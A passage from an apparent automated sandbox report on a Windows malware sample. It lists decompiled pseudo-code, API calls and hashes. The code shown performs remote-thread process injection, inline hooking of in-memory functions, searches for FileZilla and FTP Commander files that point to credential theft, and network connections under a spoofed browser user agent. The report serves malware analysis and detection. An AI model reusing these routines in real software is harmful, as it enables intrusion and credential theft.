                						goto L9;
                					} else {
                						E0040DCC2( &_a8);
                						goto L3;
                					}
                					goto L10;
                				} else {
                					E004097F7(0);
                					_t43 = 0;
                				}
                				L13:
                				return _t43;
			}

                APIs
                • ResetEvent.KERNEL32(?), ref: 0041324C
                • HeapAlloc.KERNEL32(00000008,00001004), ref: 0041325F
                • InternetSetStatusCallbackW.WININET(?,004131F5), ref: 0041328A
                • InternetReadFileExA.WININET ref: 004132CA
                • GetLastError.KERNEL32 ref: 004132D4
                • InternetSetStatusCallbackW.WININET(?,?), ref: 00413338
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CallbackHeapStatus$AllocErrorEventFileFreeLastReadReset
                • String ID:
                • API String ID: 3721613131-0
                • Opcode ID: 49f7a83317770991392ce235f6fa4fddeace65b2da52b1ec2c325bd4cf129595
                • Instruction ID: d9d175b81a573eb8cda96dcb65ee560d532a4a3bcf79016aaade26ebb910999a
                • Opcode Fuzzy Hash: 49f7a83317770991392ce235f6fa4fddeace65b2da52b1ec2c325bd4cf129595
                • Instruction Fuzzy Hash: 6B318A31118385AFCB01EF64CC84A9ABBE8FF49704F00482AF994A72A1D734C954DB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E0040B046(signed int __eax, void* __ecx, void** __esi, long _a4) {
                				intOrPtr _v8;
                				long _v12;
                				void* _t19;
                				void* _t20;
                				long _t22;
                				void* _t23;
                
                				_t33 = __esi;
                				asm("sbb eax, eax");
                				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
                				__esi[2] = _t19;
                				if(_t19 == 0xffffffff) {
                					L11:
                					_t20 = 0;
                				} else {
                					__imp__GetFileSizeEx(_t19,  &_v12);
                					if(_t19 == 0 || _v8 != 0) {
                						L10:
                						CloseHandle(_t33[2]);
                						goto L11;
                					} else {
                						_t22 = _v12;
                						__esi[1] = _t22;
                						if(_t22 != 0) {
                							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
                							 *__esi = _t23;
                							if(_t23 == 0) {
                								goto L10;
                							} else {
                								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
                									VirtualFree( *_t33, 0, 0x8000);
                									goto L10;
                								} else {
                									goto L5;
                								}
                							}
                						} else {
                							 *__esi = 0;
                							L5:
                							_t20 = 1;
                						}
                					}
                				}
                				return _t20;
			}

                APIs
                • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040800F), ref: 0040B06B
                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040800F), ref: 0040B07E
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0040800F), ref: 0040B0A6
                • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040800F), ref: 0040B0BE
                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0040800F), ref: 0040B0D8
                • CloseHandle.KERNEL32(?,?,?,?,?,0040800F), ref: 0040B0E1
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                • String ID:
                • API String ID: 1974014688-0
                • Opcode ID: e74d0a2c8f147a15a116b490acf780b5f2c6d53b743ea17bced7c6a9900d43a8
                • Instruction ID: 10d781cc93605252a6cab676625678e958298183cb8f9fbc820f822a1ad2857c
                • Opcode Fuzzy Hash: e74d0a2c8f147a15a116b490acf780b5f2c6d53b743ea17bced7c6a9900d43a8
                • Instruction Fuzzy Hash: A4119075100204BFDB208F21CC09E6BBBA8EB45700B10492DF5A6E61E0D371A941CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00413B6A(void* __ecx, long _a4, intOrPtr _a8) {
                				char _v5;
                				void* __edi;
                				void* __esi;
                				void* _t10;
                				void* _t14;
                				void* _t23;
                				void* _t25;
                				void* _t26;
                
                				_t21 = __ecx;
                				_push(__ecx);
                				_v5 = 0;
                				_t23 = OpenProcess(0x47a, 0, _a4);
                				_t28 = _t23;
                				if(_t23 != 0) {
                					_push(_t25);
                					_t10 = E00407A4C(_t21, _t23, _t25, _t28, _a8, 0);
                					_t26 = _t10;
                					if(_t26 != 0) {
                						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x4192e4 + E00407F75, 0, 0, 0);
                						_a4 = _t14;
                						if(_t14 == 0) {
                							VirtualFreeEx(_t23, _t26, 0, 0x8000);
                						} else {
                							WaitForSingleObject(_t14, 0x2710);
                							CloseHandle(_a4);
                							_v5 = 1;
                						}
                					}
                					CloseHandle(_t23);
                				}
                				return _v5;
			}

                APIs
                • OpenProcess.KERNEL32(0000047A,00000000,?,00000000,74B5F560,?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413B7E
                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00821259,00000000,00000000,00000000), ref: 00413BAC
                • WaitForSingleObject.KERNEL32(00000000,00002710,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BBF
                • CloseHandle.KERNEL32(?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BC8
                • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BDC
                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00413D20,?,?,00000000,?,?,00000000), ref: 00413BE3
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
                • String ID:
                • API String ID: 14861764-0
                • Opcode ID: dd289c01b383abc87acc3466b3e7fda05704e66ef4cf5e25379be0e872c4b371
                • Instruction ID: 35cee8e4012eda82255207dc41d42c485caeb8853b0c6136a9efa923e11a568c
                • Opcode Fuzzy Hash: dd289c01b383abc87acc3466b3e7fda05704e66ef4cf5e25379be0e872c4b371
                • Instruction Fuzzy Hash: 0A019EB2508108BFE7016FA49CC8DFF3E6CEB49399B044479F601AA121D67AAD858639
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00406898() {
                				intOrPtr _v8;
                				char _v12;
                				char* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v548;
                				char* _t18;
                				signed int _t25;
                				void* _t27;
                
                				_v28 = 0x26;
                				_v24 = 0x1a;
                				_v20 = 0x23;
                				_v16 = L"ftp*commander*";
                				E004098AA( &_v12,  &_v12, 0, 8);
                				_t25 = 0;
                				do {
                					_t18 =  &_v548;
                					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t27 + _t25 * 4 - 0x18)), 0, 0, _t18);
                					_t29 = _t18;
                					if(_t18 == 0) {
                						_t24 =  &_v16;
                						_t18 = E0040B4D8( &_v548,  &_v16, _t29, 1, 2, E00406664,  &_v12, 0, 0, 0);
                					}
                					_t25 = _t25 + 1;
                				} while (_t25 < 3);
                				_t31 = _v8;
                				if(_v8 > 0) {
                					E00412508(_t18, _v12, _t24, _t31, L"FTP Commander");
                				}
                				return E004097F7(_v12);
			}

                APIs
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 004068DD
                  • Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
                  • Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
                  • Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
                  • Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
                  • Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
                  • Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
                • String ID: #$&$FTP Commander$ftp*commander*
                • API String ID: 1211921070-1802917355
                • Opcode ID: d9ce3d69e89cb993ed4d5f8320d0448ad94950b4982496c1e8cb00909b5c1e57
                • Instruction ID: 187bf97101a5fd58f2bcb414459935c3e215890619a49b95ebdcffc87a73c8f6
                • Opcode Fuzzy Hash: d9ce3d69e89cb993ed4d5f8320d0448ad94950b4982496c1e8cb00909b5c1e57
                • Instruction Fuzzy Hash: D6016D72901128BADB20AA92DC4DEDF7B7CEF45344F004066A505B21D1D7785B48CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E004060A2() {
                				intOrPtr _v8;
                				char _v12;
                				char* _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v548;
                				char* _t18;
                				signed int _t25;
                				void* _t27;
                
                				_v28 = 0x26;
                				_v24 = 0x1a;
                				_v20 = 0x23;
                				_v16 = L"*filezilla*";
                				E004098AA( &_v12,  &_v12, 0, 8);
                				_t25 = 0;
                				do {
                					_t18 =  &_v548;
                					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t27 + _t25 * 4 - 0x18)), 0, 0, _t18);
                					_t29 = _t18;
                					if(_t18 == 0) {
                						_t24 =  &_v16;
                						_t18 = E0040B4D8( &_v548,  &_v16, _t29, 1, 2, E00405E5C,  &_v12, 0, 0, 0);
                					}
                					_t25 = _t25 + 1;
                				} while (_t25 < 3);
                				_t31 = _v8;
                				if(_v8 > 0) {
                					E00412508(_t18, _v12, _t24, _t31, L"FileZilla");
                				}
                				return E004097F7(_v12);
			}

                APIs
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 004060E7
                  • Part of subcall function 0040B4D8: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
                  • Part of subcall function 0040B4D8: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
                  • Part of subcall function 0040B4D8: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
                  • Part of subcall function 0040B4D8: Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
                  • Part of subcall function 0040B4D8: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
                  • Part of subcall function 0040B4D8: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePath$CloseFirstFolderMatchNextObjectSingleSleepSpecWait
                • String ID: #$&$*filezilla*$FileZilla
                • API String ID: 1211921070-3096872711
                • Opcode ID: 4a9638e1c729495e3a06518011fadd5d62c043f61d078d0d7e6a62dd93aaadf0
                • Instruction ID: 3fe1d5a9cda30fc07575ab88d9b3c37ccfc8ae342e46bd08777d93e6ec157a08
                • Opcode Fuzzy Hash: 4a9638e1c729495e3a06518011fadd5d62c043f61d078d0d7e6a62dd93aaadf0
                • Instruction Fuzzy Hash: BE016D72A01228BADB20AA92DC59FDF7F7CEF45744F00406AA505B61C1D7B81B45CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040A9C3(signed int __eax, char* __ecx) {
                				short _v28;
                				char* _v32;
                				signed int _t5;
                				void* _t12;
                				void* _t14;
                				char* _t15;
                				void* _t18;
                
                				_t15 = __ecx;
                				_t5 = __eax;
                				if(__ecx == 0) {
                					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
                				}
                				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
                				if(_t14 == 0) {
                					L7:
                					return 0;
                				}
                				_t18 = 0;
                				do {
                					_t1 = _t18 + 0x41900c; // 0x41900c
                					_t2 = _t18 + 0x419008; // 0x2
                					InternetSetOptionA(_t14,  *_t2, _t1, 4);
                					_t18 = _t18 + 8;
                				} while (_t18 < 0x18);
                				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
                				if(_t12 == 0) {
                					InternetCloseHandle(_t14);
                					goto L7;
                				}
                				return _t12;
			}

                APIs
                • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040A9DA
                • InternetSetOptionA.WININET(00000000,00000002,0041900C,00000004), ref: 0040A9F9
                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040AA16
                • InternetCloseHandle.WININET(00000000), ref: 0040AA22
                Strings
                • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0040A9CB, 0040A9D9
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
• Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Internet$CloseConnectHandleOpenOption
                • String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
                • API String ID: 910987326-3737944857
                • Opcode ID: 46732d16fed6cf584eed92be6836cc95d28c13d8f594663cef60e4d6497dc0a8
                • Instruction ID: b5a6bfa42ed4d4e0707bed6d15ab7d90994a7b3979132c74d0bd4dbd6d63f2e5
                • Opcode Fuzzy Hash: 46732d16fed6cf584eed92be6836cc95d28c13d8f594663cef60e4d6497dc0a8
                • Instruction Fuzzy Hash: 81F0CD722003007AE62157618C8CDAB7AADFBCDB95B08082AF946F10A1D23688608779
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E0040AE3B() {
                				char _v8;
                				struct HINSTANCE__* _v12;
                				void* _v1036;
                				struct HINSTANCE__* _t13;
                				_Unknown_base(*)()* _t15;
                				char _t22;
                				void* _t28;
                
                				_t22 = 0;
                				_t13 = LoadLibraryA("urlmon.dll");
                				_v12 = _t13;
                				if(_t13 != 0) {
                					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
                					if(_t15 != 0) {
                						_push( &_v8);
                						_push( &_v1036);
                						_push(0);
                						_v8 = 0x3ff;
                						_v1036 = 0;
                						if( *_t15() == 0) {
                							if(_v8 > 0x3ff) {
                								_v8 = 0x3ff;
                							}
                							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
                							_t22 = E00409B94( &_v1036 | 0xffffffff,  &_v1036);
                						}
                					}
                					FreeLibrary(_v12);
                				}
                				return _t22;
			}

                APIs
                • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040AE4C
                • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040AE5F
                • FreeLibrary.KERNEL32(?), ref: 0040AEB1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Library$AddressFreeLoadProc
                • String ID: ObtainUserAgentString$urlmon.dll
                • API String ID: 145871493-2685262326
                • Opcode ID: 5d2647cf2e5a827ac9efc22e1c1d64a22661d81eba7ad1dfe8dfbd7d0803629b
                • Instruction ID: ce13f8a26620cfd4a0f0c1fcd85be38cde7e0149e376efc3e652a9c93990788b
                • Opcode Fuzzy Hash: 5d2647cf2e5a827ac9efc22e1c1d64a22661d81eba7ad1dfe8dfbd7d0803629b
                • Instruction Fuzzy Hash: 3E018471D40318BFCB10DBE8DE885DE7BB8AF14300F2005BAA655F32D1D6789F448A69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00410821(void* __ecx, signed int __edx, void** __esi, long _a4) {
                				char _v5;
                				void _v16;
                				struct _OVERLAPPED* _v24;
                				struct _OVERLAPPED* _v28;
                				signed int _v32;
                				signed int _v36;
                				void* _t29;
                				signed int _t31;
                				int _t38;
                				int _t39;
                				signed int _t41;
                				int _t42;
                				int _t45;
                				intOrPtr _t48;
                				void* _t49;
                				signed int _t53;
                				struct _OVERLAPPED* _t54;
                				void** _t56;
                
                				_t56 = __esi;
                				_t53 = __edx;
                				_t49 = __ecx;
                				_t54 = 0;
                				_v5 = 0;
                				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
                				 *__esi = _t29;
                				if(_t29 != 0xffffffff) {
                					_t31 = E0040B165(_t49, _t29);
                					_v36 = _t31;
                					_v32 = _t53;
                					if((_t31 & _t53) == 0xffffffff) {
                						L4:
                						CloseHandle( *_t56);
                						 *_t56 =  *_t56 | 0xffffffff;
                					} else {
                						if((_t31 | _t53) == 0) {
                							L18:
                							_t56[2] = _t56[2] | 0xffffffff;
                							_t25 =  &(_t56[3]);
                							 *_t25 = _t56[3] | 0xffffffff;
                							__eflags =  *_t25;
                							_v5 = 1;
                							E0040B115( *_t56, _t54, _t54, _t54);
                						} else {
                							_v28 = 0;
                							_v24 = 0;
                							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
                								while(1) {
                									__eflags = _a4 - _t54;
                									if(_a4 == _t54) {
                										goto L18;
                									}
                									__eflags = _a4 - 5;
                									if(_a4 != 5) {
                										L16:
                										_t38 = E0040B115( *_t56, _v28, _v24, _t54);
                										__eflags = _t38;
                										if(_t38 == 0) {
                											goto L4;
                										} else {
                											_t39 = SetEndOfFile( *_t56);
                											__eflags = _t39;
                											if(_t39 == 0) {
                												goto L4;
                											} else {
                												goto L18;
                											}
                										}
                									} else {
                										_t41 = _v16 ^ _t56[4];
                										asm("adc edi, [ebp-0x14]");
                										_t48 = _t41 + _v28 + 5;
                										asm("adc edi, ecx");
                										_v16 = _t41;
                										__eflags = 0 - _v32;
                										if(__eflags > 0) {
                											L15:
                											_t54 = 0;
                											__eflags = 0;
                											goto L16;
                										} else {
                											if(__eflags < 0) {
                												L11:
                												__eflags = _t41 - 0xa00000;
                												if(_t41 > 0xa00000) {
                													goto L15;
                												} else {
                													_t42 = E0040B115( *_t56, _t41, 0, 1);
                													__eflags = _t42;
                													if(_t42 == 0) {
                														goto L4;
                													} else {
                														_v28 = _t48;
                														_v24 = 0;
                														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
                														__eflags = _t45;
                														if(_t45 != 0) {
                															_t54 = 0;
                															__eflags = 0;
                															continue;
                														} else {
                															goto L4;
                														}
                													}
                												}
                											} else {
                												__eflags = _t48 - _v36;
                												if(_t48 > _v36) {
                													goto L15;
                												} else {
                													goto L11;
                												}
                											}
                										}
                									}
                									goto L19;
                								}
                								goto L18;
                							} else {
                								goto L4;
                							}
                						}
                					}
                				}
                				L19:
                				return _v5;
                			}

                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00410842
                  • Part of subcall function 0040B165: GetFileSizeEx.KERNEL32(00410859,00410859,?,?,?,00410859,00000000), ref: 0040B171
                • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00410883
                • CloseHandle.KERNEL32(?,00000000), ref: 0041088F
                • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 004108FE
                • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00410924
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: File$Read$CloseCreateHandleSize
                • String ID:
                • API String ID: 1850650832-0
                • Opcode ID: 769c7ff2a0d208efa8ca2f02d1ba7244e21fbd7351909dadc1a8194520d788cc
                • Instruction ID: 5f9472da4a0aaf2be87d9083ee32606abdc65a81ad7bca5b9b9bc571f2557acd
                • Opcode Fuzzy Hash: 769c7ff2a0d208efa8ca2f02d1ba7244e21fbd7351909dadc1a8194520d788cc
                • Instruction Fuzzy Hash: 9A41D570940208AEEF249F65CC45FEFBBB9EF84350F10422AF595E62A1C77945C1CB99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E0040F207(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
                				long _v8;
                				DWORD* _v12;
                				intOrPtr _v47;
                				void _v48;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t47;
                				void* _t57;
                				void* _t60;
                				void* _t61;
                				char* _t63;
                				long _t65;
                				DWORD* _t66;
                				void* _t68;
                
                				_t61 = __edx;
                				_t60 = __ecx;
                				_t57 = __eax;
                				_t66 = 0;
                				_v12 = 0;
                				if(E0040F1C2(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
                					L17:
                					return _v12;
                				} else {
                					E004098AA( &_v48,  &_v48, 0xffffff90, 0x23);
                					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
                						L16:
                						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
                						goto L17;
                					} else {
                						_t63 =  &_v48;
                						_push(0);
                						_push(_t63);
                						while(1) {
                							_t47 = E00415980(_t57, _t60, _t61, _t63, _t66);
                							if(_t47 == 0xffffffff) {
                								break;
                							}
                							_t66 = _t66 + _t47;
                							if(_t66 > 0x1e) {
                								L15:
                								goto L16;
                							}
                							if( *_t63 == 0xe9 && _t47 == 5) {
                								 *((intOrPtr*)(_t63 + 1)) =  *((intOrPtr*)(_t63 + 1)) + _a4 - _a8;
                							}
                							_push(0);
                							if(_t66 >= 5) {
                								_t17 = _t66 + 5; // 0x5
                								_t65 = _t17;
                								 *((intOrPtr*)(_t68 + _t66 - 0x2b)) = _a4 - _a8 - 5;
                								 *((char*)(_t68 + _t66 - 0x2c)) = 0xe9;
                								if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t65, ??) != 0) {
                									_v48 = 0xe9;
                									_v47 = _t57 - _a4 - 5;
                									if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
                										_v12 = _t65;
                									}
                								}
                								goto L15;
                							} else {
                								_t63 = _t68 + _t66 - 0x2c;
                								_push(_t63);
                								continue;
                							}
                						}
                						goto L15;
                					}
                				}
                			}

                APIs
                  • Part of subcall function 0040F1C2: VirtualQueryEx.KERNEL32(000000FF,0774C084,?,0000001C,00407790,0774C084,?,?,?,00404B07,00000000,00000000,00000012,00419020), ref: 0040F1D7
                • VirtualProtectEx.KERNEL32(000000FF,00407798,0000001E,00000040,00000000,00407790,00000012,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F234
                • ReadProcessMemory.KERNEL32(000000FF,00407798,?,0000001E,00000000,?,00000090,00000023,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F25B
                • WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000005,00000000,?,00000000,00000000), ref: 0040F2CA
                • WriteProcessMemory.KERNEL32(000000FF,00407798,000000E9,00000005,00000000), ref: 0040F2EA
                • VirtualProtectEx.KERNEL32(000000FF,00407798,0000001E,00000000,00000000,?,?,00000000,?,?,?,00404DB0,00419020), ref: 0040F302
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
                • String ID:
                • API String ID: 390532180-0
                • Opcode ID: 4e95bbf845e7ee6b9ab14727c454712a9ebbfee3ae15f18ba071d0f002fc602d
                • Instruction ID: 81bee3abc07e41f1567cba4bc790272c6a00d6d0162ae91187234a9f2cc3d9db
                • Opcode Fuzzy Hash: 4e95bbf845e7ee6b9ab14727c454712a9ebbfee3ae15f18ba071d0f002fc602d
                • Instruction Fuzzy Hash: D8316F76900209BADF209EB8CD44EDE7B68AB09730F108336F921BA1D0D674DA459BA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • socket.WS2_32(00401458,00000002,00000000), ref: 0040CD6A
                • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040CD94
                • WSAGetLastError.WS2_32 ref: 0040CD9B
                  • Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8
                • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CDCD
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • closesocket.WS2_32(?), ref: 0040CDE1
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: HeapIoctl$AllocErrorFreeLastclosesocketsocket
                • String ID:
                • API String ID: 3987134166-0
                • Opcode ID: ada10e318ec9d78caef647bb69398b3cacc4aa2ee2bfa2ea5e4857f3032faccf
                • Instruction ID: aa0ae96bb59258b0e3483138c9d7eb5c5f0a928a29e454bba617148aadb03d81
                • Opcode Fuzzy Hash: ada10e318ec9d78caef647bb69398b3cacc4aa2ee2bfa2ea5e4857f3032faccf
                • Instruction Fuzzy Hash: 84112BB5801128FBDB20AFA5DD88CDF7F6DEF057A4B104276F905B65A0D2348E40EAA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004090AC(void* __ecx, CHAR** _a4, char _a7) {
                				char _v8;
                				signed int _v12;
                				char _v16;
                				short _v18;
                				char _v20;
                				intOrPtr _v24;
                				char _v32;
                				void* _v288;
                				signed char _v292;
                				char _v776;
                				char _v780;
                				void* __edi;
                				void* __esi;
                				signed short _t45;
                				signed int _t55;
                				char _t58;
                				signed int _t62;
                				signed int _t75;
                				CHAR** _t77;
                				CHAR*** _t84;
                
                				_t78 = __ecx;
                				E004098AA( &_v292,  &_v292, 0, 0x104);
                				_t77 = _a4;
